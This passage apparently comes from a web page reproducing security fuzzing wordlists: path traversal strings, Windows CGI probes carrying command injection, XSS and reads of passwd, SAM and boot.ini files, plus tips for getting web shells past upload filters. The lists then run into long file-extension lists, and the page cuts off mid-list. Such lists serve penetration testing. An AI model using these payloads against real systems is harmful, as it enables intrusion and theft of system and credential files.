././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd; try setting .jpg to executable. If you can set the target directory, try fuzzing the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
# Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
